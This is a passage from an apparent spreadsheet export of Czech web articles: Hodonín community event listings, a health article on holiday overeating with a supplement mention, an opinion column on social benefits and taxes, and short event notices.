se službou Gmail, Google Kalendář a Google Maps. Kurz je vhodný pro všechny, kteří chtějí efektivně využívat Google aplikace v každodenním životě. Lektor: Daniel Král Pátek 15.15–17.15, 8 hodin, 4 lekce Cena kurzu: s ČP 440 Kč, bez ČP 480 Kč, nad 70 let s ČP 360 Kč, bez ČP 400 Kč Angličtina I. Navazující jazykový kurz. Lektor: Mgr. Simona Nováková Pondělí 16.30–17.30, celkem 16 hodin, 16 lekcí Cena kurzu: s ČP 880 Kč, bez ČP 960 Kč, nad 70 let s ČP 720 Kč, bez ČP 800 Kč Angličtina II. Navazující jazykový kurz. Lektor: Mgr. Simona Nováková Pondělí 17.40–18.40, celkem 16 hodin, 16 lekcí Cena kurzu: s ČP 880 Kč, bez ČP 960 Kč, nad 70 let s ČP 720 Kč, bez ČP 800 Kč Francouzština pro úplné začátečníky Jazykový kurz pro úplné začátečníky. Lektor: Mgr. Alžběta Vyskočilová, Ph.D. Úterý 17.40–18.40, celkem 15 hodin, 15 lekcí Cena kurzu: s ČP 825 Kč, bez 900 Kč, nad 70 let s ČP 675 Kč, bez ČP 750 Kč Psaní článků, fejetonů a knih Jak psát články, fejetony a knihy vás naučí spisovatel a historik Petr Gruber. Lektor: Mgr. Petr Gruber Středa 16.00–17.00, celkem 10 hodin, 10 lekcí Cena kurzu: s ČP 550 Kč, bez 600 Kč, nad 70 let s ČP 450 Kč, bez ČP 500 Kč Dendrochronologie Dendrochronologie je obor, který využívá hodnoty získané z letokruhů k datování událostí. Analýza je užitečná nejen pro určení stáří dřeva, ale i pro další účely jako například pro zjišťování klimatických změn, historie povodí a řek nebo archeologii. Místo konání: Dům přírody Hodonínské Dúbravy Lektor: Ing. Josef Kyncl Středa 16.00–17.30, celkem 9 hodin, 6 lekcí Cena kurzu: s ČP 495 Kč, bez 540 Kč, nad 70 let s ČP 405 Kč, bez ČP 450 Kč Kresba Základy kresby a další rozvíjení získaných dovedností. Lektor: Mgr. Daniela Satkeová Čtvrtek 16.00–18.30, celkem 20 hodin, 8 lekcí Cena kurzu: s ČP 1100 Kč, bez ČP 1200 Kč, nad 70 let s ČP 900 Kč, bez ČP 1000 Kč Barokní epocha v Evropě Navazující kurz dějin, který vás seznámí s obdobím baroka v Evropě . Lektor: PhDr. Marek Vařeka , Ph.D. Pátek 15.45–17.15, celkem 15 hodin, 10 lekcí Cena kurzu: s ČP 825 Kč, bez ČP 900 Kč, nad 70 let s ČP 675 Kč, bez ČP 750 Kč Henry Kissinger a Samuel Huntington : Pohledy na světovou politiku. Přednáškový cyklus se zaměří na klíčové postavy a myšlenky ovlivňující světovou politiku 2. pol. 20. stol. Henry Kissinger , jako mistr reálné politiky a architekt americké diplomacie, a Samuel Huntington , známý svou teorií "střetu civilizací", nabídli rozdílné, avšak vzájemně se doplňující perspektivy na globální uspořádání. Společně prozkoumáme, jak jejich vize formovaly mezinárodní vztahy a ovlivňují svět dodnes. Lektor: PhDr. Walter Bartoš , Ph.D., MBA Úterý 16.00–17.00, celkem 8 hodin, 8 lekcí Cena kurzu: s ČP 440 Kč, bez ČP 480 Kč, nad 70 let s ČP 360 Kč, bez ČP 400 Kč Galerie výtvarného umění v Hodoníně Úprkova 2, 695 01 Hodonín , tel. 518 351 051, e-mail: info@gvuhodonin.cz, www.gvuhodonin.cz Zveme na vernisáž nových výstav, která proběhne ve středu 15. ledna 2025 v novém čase – od 18.00 – ve výstavních sálech galerie. Vstup je zdarma a zahájeny budou výstavy: Between Shadowing and Brightening | Jaroslava Šicková-Fabrici a Ján Šicko Výstava manželské dvojice sochařů z Bratislavy se v pravém dvousálí zaměří především na jejich díla z posledních let. Jaroslavina tvorba zhmotňuje existenciální témata v hliněných a kamenných objektech, někdy figurálních, jindy využívajících písma, nebo i zcela abstraktních. Jánova tvorba je více zjednodušující a geometrická, vytvořená převážně z tvrdších kamenů. Oba autoři jsou navíc průkopníky využití arteterapie v psychoterapii a často se účastní sympozií. Pavel Mrkus | Dawn Multimediální umělec a hlavní kurátor pražského Signal Festivalu připraví pro hodonínskou galerii v levém sále specifickou projekci, jejímž ústředním motivem bude putování meziplanetární sondy DAWN. Jindřich Štreit | Vesnice roku 1980 Věhlasný autor sociálně zaměřené dokumentární fotografie v komorní výstavě představí soubor třiceti dosud nevystavených fotografií, vybraných z bohatého autorova archivu negativů nasnímaných v 80. letech 20. století. V průběhu výstavního termínu jsou v plánu také komentované prohlídky, případně jiné doprovodné akce. Bližší informace budou včas zveřejněny na stránkách www.gvuhodonin.cz a sociálních sítích galerie. čtvrtek 23. 1. 2025 9.30–11.00 | HANDS ON ART | Frotáž Pod vedením edukatorky si děti v dílně vyzkouší výtvarnou techniku frotáže (přenášení reliéfních povrchů na papír) a vytvoří si tak vlastní obrázek. Pro děti od 2 do 7 let s doprovodem. Rezervace e-mailem kosutkova@gvuhodonin.cz, cena: 100 Kč dítě + 50 Kč sourozenec, doprovod zdarma. Cesta z Majoliky do Kameniny a zase zpět | Vladimír Groš | do 5. 1. 2025 Výstava nejen humorných keramických plastik. LAND/SCAPE | Veronika Remak Molatová | do 5. 1. 2025 Výstava působivé krajinomalby. Jakub Nepraš | Meadow | do 5. 1. 2025 Výstava specifického audiovizuálního objektu. Masarykovo muzeum v Hodoníně zámeček, Zámecké náměstí 27/9, Hodonín , tel. 518 351 834, e-mail: masarykovomuzeum@masaryk.info Modré na bílém – Antonie Dostálková a její modrotisková tvorba do 16. 3. 2025 Výstava prezentující tvorbu Antonie Dostálkové. Na základě vlastních návrhů vytváří různé textilní předměty. Inspiraci nachází ve světě pohádek, v přírodě či lidových zvycích. Součástí výstavy je edukační program v podobě kreativních dílen. Více informací na webu masaryk.info. budova sálu Evropa , Národní tř . 21, Hodonín , tel. 518 352 271, e-mail: evropa@masaryk.info Samuraj Miyamoto Musaši, jeho doba, souboje a odkaz do 23. 2. 2025 Výstava historických originálů japonských mečů a dalších artefaktů z českých sbírek představí fascinující osobnost Miyamoto Musašiho (1583–1645), slavného mistra meče, myslitele a současně skvělého malíře ve stylu monochromní tušové malby. Centrum pro rodinu a sociální péči Hodonín , z. s. Štefánikova 15, Hodonín , www.cprhodonin.cz Rodina a děti Herna: PO – PÁ 9.00–12.00; 14.00–18.30 Poselství Malého prince – inspirativní odpoledne pro rodiče a děti 16. 1. v 16.00–19.00: seminář s tématikou knihy Malý princ s přesahem do výchovy děti s lektorkou Hanou Švandelkovou. Vhodné pro rodiče, učitele a děti od 7 let. Informace: dolezalova@cprhodonin.cz Karneval 6. 2. v 15.30–18.30: Tradiční masopustní zábava v kostýmech pro rodiče s dětmi. Připravené budou různé tematické hry, tvoření a hudba. Informace: kocvarova@cprhodonin.cz, 720 410 988 a komosna@cprhodonin.cz, 720 410 988. Kroužky pro rodiče s dětmi: uvolněná místa v kroužcích Klubík PO 10.00–10.45: přihlašujte sourozence ve věku 0–3 roky. Batolátka ST 8.55–9.40 a ČT 9.00–9.45: přihlašujte samostatnější, chodící děti. Šídla ST 10.05–10.50: přihlašujte děti od 1,5 roku do 3 let. Koná se v tělocvičně TJ Sokol. Miminka ČT 10.00–10.45: přihlašujte děti od 4 měsíců do 1 roku. Bližší informace a přihlášky jsou na webu i Facebooku. Fyzioterapie pro rodiče s dětmi od narození: na individuální konzultace se můžete objednávat na tel. čísle 736 724 146 (možno psát SMS), příp. na emailu pakostova@seznam.cz Děti Kroužky pro děti od 3 let: uvolněná místa v kroužcích Hvězdičky ST 15.30–16.15 a ST 16.30–17.15: všeobecné pohybové aktivity pro kluky i holky Angličtina ST 15.30–16.15: výuka hravou formou pro děti od 4 let. Kroužky pro děti od 6 let: Keramický workshop ČT 15.30–17.30: tvoření z keramické hlíny pro děti od 6 let, koná se jednou za 14 dní. Informace: kocvarova@cprhodonin.cz, 720 410 988 a komosna@cprhodonin.cz, 720 410 988. Bližší informace, termíny a přihlášky budou uvedeny na webu i Facebooku. Rodičovství Nejpalčivější témata výchovy dětí: 16. 1. v 9.30–11.00: seminář pro rodiče zaměřený na důležité otázky výchovy dětí. Lektorka Soňa Tomíková. Trénink sociálních a emočních dovedností dítěte s ADHD: trénink pozornosti, koncentrace a paměti: 29. 1. v 17.00– 18.30 seznámení s principy, postupy a technikami tréninku sociálních a emočních dovedností dítěte, a to v jeho přirozeném prostředí s lektorkou Markétou Librovou. Zapojení prarodičů do výchovy a života dítěte: 30. 1. v 9.30– 11.00: setkání s lektorkou Soňou Tomíkovou nad tématem mezigenerační komunikace a domluvy. Průvodce výchovou: individuální poradenství pro rodiče s lektorkou Soňou Tomíkovou. Termín si domluvte telefonicky na 737 832 333. Průvodce neklidem: vždy před setkáním skupiny o neklidných dětech, popř. online. Termín si domluvte na emailu dolezalova@cprhodonin.cz. Manželé a páry Prodej nedatovaných kalendářů Partnerský kompas. Informace: www.partnerskykompas.cz, 774 650 133. Základní sociální poradenství, individuální, rodinná a párová terapie, mediace. Informace: zalesakova@cprhodonin.cz, 602 632 943. Odborné služby pro rodiny Doprovázíme také osoby, kterým bylo svěřeno dítě do péče: poskytujeme podporu, vzdělávání a odborné doprovázení dospělým i dětem. Máme volnou kapacitu k uzavírání Dohod o výkonu pěstounské péče: doprovázení, podpora a vzdělávání pěstounů a svěřených dětí. Nabídka psychoterapie (párová, rodinná, individuální, pro děti), mediace (vedena jedním či dvěma mediátory) v online prostředí nebo osobně. Individuální poradenství pro děti v bezpečném a důvěrném prostředí. Asistované předávání a kontakty. Poradenství pro dospělé při rozchodu a rozvodu rodičů, ale i v jakýchkoliv jiných nesnázích. Doprovázení rodiče po odebrání dítěte a rodiče, který nemá své dítě v péči. Informace: kristova@cprhodonin.cz, 602 632 943. Vzdělávací centrum Akreditované vzdělání pro sociální pracovníky, pracovníky v sociálních službách, ale i veřejnost. Nabídku naleznete na webových stránkách. Informace: zalesakova@cprhodonin.cz, 602 632 943. Připravujeme Připravujeme Kurz efektivního rodičovství: kurz o výchově, komunikaci a vztazích s lektorkou Soňou Tomíkovou. Anatomie lásky 10. – 16. 2.: Inspiromaily k Národnímu týdnu manželství. Láskyplné vztahy 20. 2. v 17.00–18.30: Kurz Báry Vackové na téma, jak formulovat pochvalu a vyjádřit vděčnost tak, aby to posílilo vztah a podpořilo dlouhodobou spokojenost. První pomoc dětem: seminář s lektorkou Annou Jurkovičovou . Klub mladých Střediska volného času Hodonín Horní Valy 2, 695 01 Hodonín , tel. 725 341 592 e-mail: km.hodonin@seznam.cz, facebook: Klub mladých Lednová olympiáda 16. 1. 2025 * 16.00–17.00 Zábavné sportovní odpoledne pro děti, které milují pohyb. Nezapomeň si vzít: sportovní oděv, pití a chuť se pobavit. Nově v nabídce: Little Stars Pondělí * 16.30–17.30 Pohybové aktivity pro děti od 4 do 8 let. Základní taneční prvky v moderním tanci se společnou choreografií. První schůzka: 17. 2. 2025. Připravujeme: BUBU karneval 27. 2. 2025 * 9.30–11.00 Maškarní veselice, spousta zábavy, her a legrace pro naše nejmenší. Hry FAIR PLAY 27. 2. 2025 * 16.00–17.00 Sportování v duchu fair-play pro děti, které milují pohyb. Nezapomeň si vzít: sportovní oděv, občerstvení a chuť se pobavit. Dětská kreativita 27. 2. 2025 * 15.00–16.00 Zážitková pedagogika se zaměřením na grafomotoriku a jemnou motoriku zábavnou a hravou formou v rámci výtvarné dílny. Regionální centrum Hodonín Masarykovo náměstí 27 Pozvánka na výstavu perníků Výstava se uskuteční v termínu od 13. 1. do 28. 2. 2025. Přístupná bude v otvírací době regionálního centra v úterý až sobotu. ZÁLESÁCI – pobyt v přírodě, z. s. Národní třída 262/4, 695 01 Hodonín , tel. 602 779 972 Spolek ZÁLESÁCI – pobyt v přírodě a pobočný spolek AVZO BPP Hodonín pořádají jako každoročně letní tábory na Mlýnkách u Strážnice a v Čeložnicích . Jedná se o tři čtrnáctidenní letní tábory, zaměřené nejen na pobyt v přírodě, u každého je připravená zajímavá celotáborová hra. Tábor na Mlýnkách je určen pro děti ve věku od 8 let (v Čeložnicích dle požadavku vedoucích), ubytování na Mlýnkách je zajištěno v chatkách, v Čeložnicích v podsadových stanech: I. turnus v Čeložnicích 29. 6. – 12. 7. 2025, hlavní vedoucí Ludvík Janeček, tel.: 724 749 316, e-mail: ludva.janecek@seznam.cz, celotáborová hra: Cesta kolem světa, cena 5 100 Kč, pro děti od 7 do 15 let. II. turnus v Čeložnicích 13. 7. – 26. 7. 2025, hlavní vedoucí Vojtěch Chudý, tel.: 733 140 549, e-mail: vojta.chudy@seznam.cz, celotáborová hra: Herkulova Odysea, cena 5 100 Kč, pro děti od 8 do 15 let. III. turnus na Mlýnkách 27. 7. – 8. 8. 2025, hlavní vedoucí Marek Prostředník, tel.: 702 195 572, e-mail: m.prostrednik@ seznam.cz, celotáborová hra: Survivor – zpátky ve hře, cena 8 200 Kč. Na táborech je zajištěno stravování pětkrát denně, pro děti jsou připraveny celotáborové hry. Na Mlýnkách je k dispozici bazén. Děti čeká na všech táborech bohatý program pod vedením zkušených vedoucích. Naše tábory se uskutečňují za finančního příspěvku města Hodonína . Přihlášky a případně další informace je možno získat u jednotlivých hlavních vedoucích, zejména e-mailem, dále v CA LIDO, Dolní Valy 1 v Hodoníně , tel.: 518 342 867 nebo u JUDr. Vítězslava Krabičky, e-mail: krabicka.advokat@seznam.cz, tel. 602 779 972. Senioři ČR, z. s., Hodonín Senioři ČR, z. s., městská organizace Hodonín Horní Valy 2, tel. 518 340 147 Úřední hodiny v úterý 9.00–12.00 Právní poradna JUDr. Račické pro velký zájem pokračuje, objednání zprostředkuje Ing. Polášek na výše uvedeném tel. čísle. Každé pondělí přátelské posezení v klubovně seniorů od 15.00. Každé úterý sportovní hry v našem sídle od 14.00. Každé středeční odpoledne jsou v klubovně seniorů hudební zkoušky sboru Sexteto Plus. Připravujeme Beseda s městskou policií 4. 2. v 15.00 v klubovně na Horních Valech. Zájezd na zvěřinové hody 13. 2. do Tvrdonic . Odjezd ve 12.00 od nádraží. Předprodej s výběrem jídla bude 21. 1. 2025 od 9 do 12 hod. v kanceláři klubovny. Zajištuje p. Zipperová Pobytový zájezd u moře od 31. 8. – 6. 9. 2025 Slovinsko – Portorož s polopenzí. Ubytování ve 4* hotelu Life Class Resort (dvoulůžkové pokoje se soc. zař.). Volný vstup do termálního bazénu, vyhřívaného bazénu s mořskou vodou, venkovního bazénu a na pláž Meduza, která patří k hotelu. Program: zastávka v Mariboru , výlet Itálie – zámek Miramare a Terst , nazpět zastávka v Lublani . Přihlášky přijímá p. Vlasta Stahalová na tel. č. 606 956 076 do 14. 1. 2025. Spolek zdravotně postižených občanů ZO č. 1 Hodonín kancelář Palackého 14 Pořádá ve spolupráci s Domem kultury Hodonín Výroční členskou schůzi, a to 13. 2. 2025 od 14.00 následuje SPOLEČENSKÉ SETKÁNÍ, na které zveme širokou veřejnost V 15 hodin kulturní program, od 17.00 zahraje k tanci a poslech DUO Rubín Malé občerstvení zajištěno. Také bar v provozu. Cena vstupenky 160 Kč. Možno zakoupit každý čtvrtek 9.00–11.00 na ul. Palackého 14, Hodonín , u svých důvěrnic, nebo na místě. Tombola vítána Každý čtvrtek 9–11 hodin můžete v kanceláři Palackého 14 přihlásit zájezdy, zakoupit vstupenky na večírek, přinést tombolu, popovídat si. Každý čtvrtek od 13.00–14.00 vstup do krytého bazénu po předložení členského průkazu s fotografií – zdarma.</t>
  </si>
  <si>
    <t>20250101_391_3693445616_811027278800ac8b7411.html</t>
  </si>
  <si>
    <t>811027278800ac8b7411</t>
  </si>
  <si>
    <t>Nový rok bez výčitek a zdravotních obtíží. Stačí se jen nepřejídat, pravidelně se hýbat a pít dostatek vody</t>
  </si>
  <si>
    <t>Nový rok bez výčitek a zdravotních obtíží. Stačí se jen nepřejídat, pravidelně se hýbat a pít dostatek vody 1.1.2025 Red Známe to všichni. Konec roku se všeobecně nese v duchu radostných večírků a milých setkání, v rámci kterých jde zdravý životní styl zkrátka stranou. Nedostatečný spánek, který sotva splňuje 7 hodin, kaloricky nabitý jídelníček, omezení sportovních aktivit a sporadický pitný režim založený více na alkoholu než čisté vodě. Přestože je naše tělo na určitý nápor připravené, má také své hranice a limity. Aby následky nebyly větší než samotné oslavy, je nutné organismu pomoct a snažit se negativní dopad bujarého období minimalizovat. Není však potřeba se veselí vyloženě vzdát a předepisovat si přísné diety! Jak tedy efektivně zvýšený kalorický příjem kompenzovat? Oslavy plné pohody, radosti a neomezené hojnosti Domácí cukroví, obložené mísy, nazdobené chlebíčky a hora bramborového salátu, který teprve s vydatnou porcí majonézy dostává ten pravý šmrnc. Svátky se zkrátka bez tradičních pochutin, šumivých přípitků a večerů plných zábavného programu, který častokrát končí až v ranních hodinách, neobejdou. Přestože se na vánoční období a aktivity s ním spojené většina z nás těší celý rok, pro lidský organismus jsou to dny intenzivní kompenzace našich rozhodnutí, nejen z pohledu výživy, ale i dočasného životního tempa. Důsledkem nadměrného příjmu cukrů, tuků, alkoholu a nedostatečného pohybu společně se zhoršenou spánkovou hygienou dochází k přetížení hned několika významných systémů. „Nárazové a intenzivní přejídání, konzumace alkoholu a narušení spánkového režimu může být pro tělo ještě horší než dlouhodobě mírné odchýlení od zdravého životního stylu. Kromě metabolismu, který má omezenou schopnost zpracovávat velký nával kalorií a energie, proto přebytečné cukry ukládá v podobě tuku do různých částí těla, trpí také střevní mikrobiom. Vysoký příjem alkoholu , tuků a cukrů způsobuje rychlou změnu jeho složení, čímž se značně narušuje jeho rovnováha,“ komentuje Ing. et Ing. Barbora Procházková , Ph.D. , jež se mimo jiné podílí i na vývoji genetických testů a testování střevního mikrobiomu v Chromozoom. Genetička také upozorňuje, že vlivem přebytečných tuků a cukrů dochází rovněž k dočasnému poškození jater, například v podobě steatózy (ztučnění jater). „Steatóza jater může vznikat velmi rychle, někdy již během několika dnů až týdnů, pokud dochází k nadměrnému příjmu kalorií, zejména cukrů a tuků, nebo alkoholu . Naštěstí je v raných stádiích tento stav reverzibilní při návratu ke zdravému životnímu stylu. Alkohol také podporuje produkci volných radikálu, které taktéž poškozují jaterní buňky. I funkce endokrinního systému může být tímto dočasným způsobem života značně ovlivněna. Nárazová změna je častokrát příčinou narušení hormonální rovnováhy, což může vést ke zhoršení spánku, ale také psychického stavu,“ dodává . Kromě špatné nálady ale může dojít i k narušení správné funkce hormonů souvisejících s chutěmi a pocitem hladu. Zde však pozor! Ne vždy je totiž spouštěčem výhradně špatný životní styl. Chutím zkrátka neporučíš! Není tajemstvím, že nutkavý pocit vyššího příjmu určitých potravin bohatých především na tuky a cukry je častokrát jen kompenzací konkrétních stavů, které se v těle dočasně odehrávají. Nedostatek spánku, náhlý pokles energie, prudké hormonální výkyvy či jen upuštění od přísných dietních návyků, které se snažíme dodržovat. Věděli jste však, že chutě mohou být podmíněny také geneticky? „DNA se skutečně může podílet na zvýšených chutích, a ovlivňovat tak chuťové preference a metabolické procesy. Například lidé s určitým polymorfismem genu TAS2R38, který zodpovídá za citlivost na hořkost, mají intenzivnější potřebu a častěji preferují sladké nebo také tučné potraviny. Mutace genu MC4R (melanokortinového 4 receptoru) jsou nejčastější genetickou příčinou obezity. Tento gen hraje klíčovou roli v regulaci pocitu sytosti a hladu. Jeho mutace mohou vést ke zvýšené chuti k jídlu, zejména k preferenci energeticky bohatých potravin, což zvyšuje riziko nadváhy a obezity. Také varianty genu FTO ovlivňují sklony ke konzumaci většího množství kalorií, zejména prostřednictvím energeticky bohatých jídel, jako jsou tučné a sladké potraviny,“ vysvětluje Procházková . Vánoce proto mohou být pro jedince s těmito genetickými predispozicemi opravdovou zkouškou ohněm. Podle genetičky Procházkové však existují způsoby, jak jednoduše chutě uspokojit a zároveň tělo zbytečně nezatěžovat: „Jednou z možností jsou zdravější varianty potravin. Místo klasických sladkostí, které kromě rafinovaného cukru překypují také dalšími uměle vytvořenými dochucovadly, volit raději alternativy slazené ovocem, medem či stévií. To stejné platí i u tuků. Ideálním zdrojem je například avokádo nebo různé druhy ořechů a semínek. Velmi prospěšné je také plánování jídla, které by vždy mělo obsahovat dostatečnou porci bílkovin pro lepší zasycení a vlákniny, která zajišťuje stabilizaci cukru v krvi a je navíc důležitá pro náš mikrobiom.“ Jak tedy intenzivní oslavy kompenzovat bez striktních pravidel? Každý si chce novoroční oslavy užít naplno a dopřát si vše, na co se celý rok tak těšil. Aby se však člověk s následky bujarých večerů nepotýkal ještě dlouho po jejich konci, není třeba si něco zakazovat. Stačí se jen zaměřit na určitá doporučení, díky kterým si svátky člověk užije plnými doušky bez budoucích výčitek a zdravotních komplikací v podobě zvýšené hmotnosti, oslabení svalové kondice či zažívacích potíží v důsledku narušeného střevního prostředí. Přestože nelze vypíchnout, jaká látka je pro člověka tou nejrizikovější, dle genetičky Procházkové je vhodné minimalizovat příjem především nadměrného alkoholu a trans tuků, které mají nejškodlivější dopad. „Přestože nelze z důvodu individuality každého z nás přesně stanovit, kde se nachází ta pomyslná hranice, kterou z pohledu zdraví není vhodné překračovat, existují obecná doporučení, jež mohou být velmi užitečným vodítkem a nápovědou. Přidaného cukru by dospělý člověk neměl sníst více než 50 g, což je přibližně 10 % celkového kalorického příjmu na den. Přesáhnutí této hodnoty je vhodné kompenzovat fyzickou aktivitou, která nadbytek glukózy využije v rámci spálené energie. Užitečné je také do jídla zařadit dostatek vlákniny, která podporuje trávení, pomáhá regulovat hladinu cholesterolu a zároveň zpomaluje vstřebávání cukrů. Tuky by měl člověk čerpat především ze zdravých zdrojů a neměly by přesáhnout 35 % denních kalorií. Co se týče alkoholických nápojů, bezpečnou hranicí pro ženy je jeden drink, tedy maximálně 10 gramů čistého alkoholu , a pro muže dva. Pokud však člověk pije více, měl by rovněž zvýšit i příjem čistých tekutin, nejlépe vody, díky čemuž pomůže játrům a ledvinám se lépe zbavit nežádoucích toxinů. Celkovou funkci organismu, který během svátků člověk zatěžuje více než obvykle, je vhodné podpořit například i doplňky stravy. V Chromozoom jsme s odborným týmem vyvinuli suplement Detoxify, který příznivě působí na trávení, je účinným pomocníkem jater při detoxikaci a optimalizuje také funkci ledvin,“ doplňuje Procházková . Klíčem ke klidným svátkům bez výčitek je především takzvané mindful eating, tedy vědomé jezení. Místo přecpávání a bezmyšlenkovitého ochutnávání všeho, co člověku přijde pod ruce, je vhodné jídlu opravdu věnovat pozornost, jíst pomalu a užít si každé sousto. Nejenže požitek z každoročního svátečního pohoštění je o to větší, zároveň dáváme tělu dostatek času si situaci uvědomit a náležitě se na ni připravit. Není třeba se během svátků omezovat, je však vhodné chvilkové požitky kompenzovat, a být tak tělu nápomocný. Foto: archiv Autor: Red</t>
  </si>
  <si>
    <t>466</t>
  </si>
  <si>
    <t>461</t>
  </si>
  <si>
    <t>20250101_392_3693798382_ee7931ee09f2149b00dc.html</t>
  </si>
  <si>
    <t>ee7931ee09f2149b00dc</t>
  </si>
  <si>
    <t>Logika našeho systému a tušené laškování s Jendou. Komentář Štěpána Chába</t>
  </si>
  <si>
    <t>Logika našeho systému a tušené laškování s Jendou. Komentář Štěpána Chába komentář 01.01.2025 Foto: Se svolením MPSV Popisek: Marian Jurečka Jenda od Mariana, ona familiérně nazvaná digitalizace sociálních dávek, ten se letos předře. I já, zarputile odmítající se s Jendou spustit, už si obhlížel jeho ztepilou postavu. Jenda, vlajková loď naší vlády a kamarád do deště pro příští rok. Ceny za potraviny nám mezi lety 2022 a 24 vzrostly o 28,2 %, oblékání a obouvání o 32,5 %, bydlení a energie nám vylezly o 39,3 %, platy stagnují. Já už se pomalu začínám hlásit u církve svaté, zdali by mě ještě zaživa nezapsala na seznam všech svatých, protože se den co den intenzivně zjevuju nad účtem za nákup jídla. U elektřiny se mi mezi lety 2022 a 2024 ceny zdvojnásobily. A na Karvinsku, na Karvinsku už se objevili „zloději“ uhlí , kteří si do tamních dolů zašli nakutat svépomocí. Nejspíš neměli v plánu doma umrznout, ale ruka zákona si na ně počíhala, a dostali se tak do povědomí. „Zloději“, nechtěli umrznout. Och, jak ten systém umí být krutý. Poslední ránu traverzou po hlavě jsem si užil u pohledu na minimální zálohy u zdravotního a sociálního pojištění. No jo, permanentně jedu jen na minimálních zálohách, vejš mi není dáno vyšplhat. Teď už si chce stát na sociálním a zdravotním pojištění odhryznout z mé skromné výplaty osm tisíc měsíčně. A tak si říkám – jak to dělat a nezačít krást? Volných osm tisíc měsíčně ve výhledu nemám. Už těch sedm, co jsem měl platit v předešlém roce, mě uvedlo do značných rozpaků, které budu řešit, až mi to na sociálce sečtou. Osm už definitivně přešláplo hranici, kterou je můj skromný rozpočet ochotný tolerovat a nezačínat se rozpadat. Naopak. Už ten včera neslavně odumřelý rok 2024 mě nahnal na okraj lopaty jistých narážek ze strany ČSSZ, která brzy přijde účtovat s jednou rukou nataženou a druhou rukou zaťatou kolem držáku exekučního pendreku. Už ji cítím za dveřmi, mrchu hladovou. To zas bude. Ale ano, napadá mě cesta, cesta, do které asi bude tlačena spousta lidí. Přejít do šedé ekonomiky. Odkráčet mimo dohled státu. Ale nechci, moc rád bych vlastenecky platil, aby bylo na F-35 i Leopardy, ale když ono těch F-35 i Leopardů je moc. Nejde to uplatit. Hlásím, že role státu jako drába mi začala citelně přerůstat přes hlavu a jeho zmnohonásobené desátky dosáhly takové úrovně, že už to začíná likvidovat mou rodinu. A tak se vrátím k laškovnímu tanečku s Jendou. Jenda je digitalizace žádostí o dávky sociální pomoci. Hodil jsem si do kalkulačky naši rodinu. Bezmála deset tisíc mi to vypsalo. Takovou nám Jenda slibuje měsíční apanáž. Celých šest let se tomu bráním, nepobírám přídavky, nikdy nic po státu nechci, ale teď jsme se dostali do fáze, kdy si jedno vášnivé kolečko s Jendou nejspíš zatančím. A to, co mi Jenda pošle, to mu pošlu zpátky na sociálním a zdravotním pojištění. Ale já to chápu, na stíhačky a tanky se někde vzít musí. Sice budou od nákupu ležet v garážích a hangárech, občas je provětráme na dnech NATO v Ostravě , ale jinak nám budou dokonale k neužitku. K čemu také ty pekelné stroje, které neumí nic jiného než ničit. Vím, vím, musíme plnit limity NATO , s Trumpem u vesel pak dvojnásob. Ale nebylo by od věci, po vzoru Německa , být trochu kreativní? Němci do výdajů na obranu dávají opravy silnic, my bychom do nich mohli dávat vykrmování budoucích vojáků. Už jen tím, že jim necháme něco na jídlo. Je to dobrá politika státu? Nahnat lidi buď do šedé ekonomiky, na úřady práce pro dávky, nebo pro obojí? Neznamená to, že nula od nuly pojde? Sice stát víc vybere, ale také víc vydá. Novoroční komentář jako víno . Jenda bude letos na roztrhání. Někdo ty nálady z chumlu spodních deseti milionů nosit musí. Vložil: Štěpán Cháb Autor: Štěpán Cháb Autor person Štěpán Cháb</t>
  </si>
  <si>
    <t>20410</t>
  </si>
  <si>
    <t>26450</t>
  </si>
  <si>
    <t>20250101_393_3693251536_c3cf00b56e788dddacc6.html</t>
  </si>
  <si>
    <t>c3cf00b56e788dddacc6</t>
  </si>
  <si>
    <t>14. Rudolfínský ples</t>
  </si>
  <si>
    <t>14. Rudolfínský ples Společenský repertoár 16. a 17. století Již 14. ročník ojedinělého plesu s neopakovatelnou atmosférou renesanční slavnosti. Pobýt může každý, tanečník i netanečník. Stačí obléci si oděv ve stylu evropské renesance či raného baroka a vydat se s námi na cestu časem. Vybalte své nejhezčí šaty, pohár na víno a vyberte si ze seznamu skladeb. Kostýmová povinnost renesance a raného baroka, Evropa . Vstupné: v předprodeji 850 Kč Autor: Karel Zavadil Autor person Karel Zavadil</t>
  </si>
  <si>
    <t>20250101_394_3693207874_b497aab7e22631c2ef1c.html</t>
  </si>
  <si>
    <t>b497aab7e22631c2ef1c</t>
  </si>
  <si>
    <t>Zvěřinový Bufetový Brunch</t>
  </si>
  <si>
    <t>Zvěřinový Bufetový Brunch Vychutnejte si, každou neděli, tématický, bufetový brunch z lokálních surovin za doprovodu živé hudby. Vychutnejte si, každou neděli, bufetový brunch z lokálních surovin za doprovodu živé hudby. Každou neděli od 12:30 se můžete se těšit na 46 chodů včetně speciálních "The Artisan" pokrmů šéfkuchaře Davida Rejhona.Součástí Artisan brunche bude také možnost nahlédnout do zámezí restaurace, kterým Vás provede sám šéfkuchař David Rejhon.Celé odpoledne doplní živá vystoupení talentovaných hudebníků a bude možnost vyhrát v tombole hodnotné ceny.Parkování po dobu brunche zdarma.Cena je 1495 Kč včetně neomezené konzumace nealkoholických nápojů, kávy a čaje, vína a piva (1295 bez alkoholu ), pro děti 7-12 let 645 Kč, děti do 6 let mají vstup zdarma.Více informací a rezervaci brunch navštivte tento odkaz.Rezervace na: Reservation widget | The Artisan (bookiopro.com) Autor: Karel Zavadil Autor person Karel Zavadil</t>
  </si>
  <si>
    <t>20250101_395_3693115462_5f222af7acd6ca6de68a.html</t>
  </si>
  <si>
    <t>5f222af7acd6ca6de68a</t>
  </si>
  <si>
    <t>Kluziště Kulaťák</t>
  </si>
  <si>
    <t>Kluziště Kulaťák Bruslení pro veřejnost v Dejvicích . Je pro Vás připravena ledová plocha o rozloze 25 × 18 metrů. Součástí areálu je i občerstvení - Široká nabídka teplých a studených nápojů. Pro zahřátí dobře poslouží svařák, punč, čaj a nebo čerstvě pražená káva. Nebude samozřejmě chybět čepované pivo , párek v rohlíku a donuty pro děti. Otevírací doba pro veřejnost Pondělí: 13:00 - 21:00 Úterý: 13:00 - 21:00 Středa: 13:00 - 21:00 Čtvrtek: 13:00 - 21:00 Pátek: 13:00 - 21:00 Sobota: 9:00 - 21:00 Neděle: 9:00 - 21:00 Vstupné Celodenní vstupné: Dospělý 140 Kč, děti 90 Kč pro školy a školky vstup zdarma Autor: Karel Zavadil Autor person Karel Zavadil</t>
  </si>
  <si>
    <t>20250101_396_3973574332_1fad89c9a3cfe51ec11f.html</t>
  </si>
  <si>
    <t>1fad89c9a3cfe51ec11f</t>
  </si>
  <si>
    <t>901-998 - Podrozvahové účty</t>
  </si>
